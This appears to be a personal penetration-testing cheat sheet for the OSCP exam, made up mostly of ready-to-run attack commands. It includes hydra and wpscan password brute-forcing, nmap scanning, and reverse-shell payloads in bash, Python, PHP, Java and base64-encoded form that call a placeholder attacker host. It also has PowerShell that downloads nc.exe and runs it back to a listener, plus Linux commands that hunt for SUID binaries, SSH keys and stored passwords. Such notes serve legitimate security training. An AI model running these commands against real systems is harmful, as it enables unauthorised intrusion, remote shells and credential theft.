offical exam guide
offical exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP juice box: OWASP security trainings
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[google gruyeye]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool
feroxbuster: powerful forced browsing tool (gobuster、dirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explain command-line
SecLists: It's a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis.
Microsoft Security Response Center
linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide
2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
Make sure there are no maximum number of login attempts. To perform a manual check.
IMAP
hydra -L usernames.txt -P wordlists.txt -s 143 -f 192.168.0.1 imap
PostgreSQL
hydra -l <username> -P /usr/share/wordlists/rockyou.txt 192.168.121.60 postgres
for normal connection
psql -U <username> -p 5432 -h <hostname or ip>
HTTP Basic Authentication
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get / # (/):default
JSON
# Content-Type、Accept、Origin、X-Requested-With、Referer and CSRF checks、Cookies
# use cURL to check necessary headers
hydra -l admin -P ~/Documents/rockyou.txt test.com https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"
get a list for password crackers
cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
scan a subnet
# Note that if set too fast may affect the results
nmap -T3 192.168.10.0/24
scan all TCP ports and services
nmap -Pn -p- -sC -sV -T4 <target ip>
optimizing performance
nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second
# and then specific port
nmap -p <target port> -sC -sV <target ip>
# UDP
nmap -p- --min-rate 1000 -sU <target ip>
ncat
ncat -e /bin/bash <attacker ip> <attacker port>
python3(file)
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
python(file)
#!/usr/bin/env python
import os
import sys
try:
os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'")
except:
print 'ERROR...'
sys.exit(0)
When using the exploit file to pass command parameters fails
python
command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"
java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);
php(file)
<?php system(\"nc -e /bin/bash <attacker ip> <attacker port>\"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>
for some special cases
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f
base64
echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash
crontab -l
ls -alh /etc/cron.* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
unprivileged Linux process snooping: pspy
Finding application
wpscan --url http://192.168.0.1/
Enumerating valid usernames
wpscan --url http://192.168.0.1/ --enumerate u1-1000
Enumerating themes
wpscan --url http://192.168.0.1/ -e at
curl -k -s http://192.168.0.1/wp-content/themes/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Enumerating plugins
wpscan --url http://192.168.0.1/ -e ap
wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token:display vulnerability data (not always necessary), register a uesr and get the api key from wpscan offical website
curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Brute-force attack
wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin
SSL peer certificate or SSH remote key was not OK
wpscan --url https://192.168.0.1/ --disable-tls-checks
📂 LFI
file in Windows
C:\Windows\System32\drivers\etc\hosts
git clone https://github.com/Tib3rius/AutoRecon.git
cd AutoRecon
sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results
find subdomains
wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# hw:hide responses words
need to authenticate
# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>
post requests
wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d postdata
# -z file,wordlist
# hc:hide responses code
create new password list
echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt
MD5
REM Try using m=0
.\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt
Typical site folders
/srv/http/
/var/www/html/
avoid permission denied messages
find / -name *kali* 2>&-
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find files containing specific text
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
finding SUID executables
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find ssh key
find / -type f -name id_rsa* 2>&-
what the group can do
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null
upgrade reverse shell in Kali
# 1.switch to bash
bash
nc -nlvp <local port>
# 2
/usr/bin/script -qc /bin/bash /dev/null
# 3
script -c "/bin/bash -i" /dev/null
# chsh - change your login shell
chsh /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1.finding current shell
echo $0
# 2.finding current shell
/proc/self/exe --version
icacls: Performs the operation on all specified files in the current directory and its subdirectories.
icacls <directory> /t
Remarks
A sequence of simple rights:
F - Full access
M - Modify access
RX - Read and execute access
R - Read-only access
W - Write-only access
download file
certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"
get file hash
certutil -hashfile <file> MD5
find files containing specific text
findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf
bypass
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1
zip
Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist
unzip
Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop
reverse shell
powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"
disable search in address bar function, easier to test
type in searchBar "about:config"
Accept warning
Search "keyword.enabled" and change it to false
modify header tool (or Burp Suite)
https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/
C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts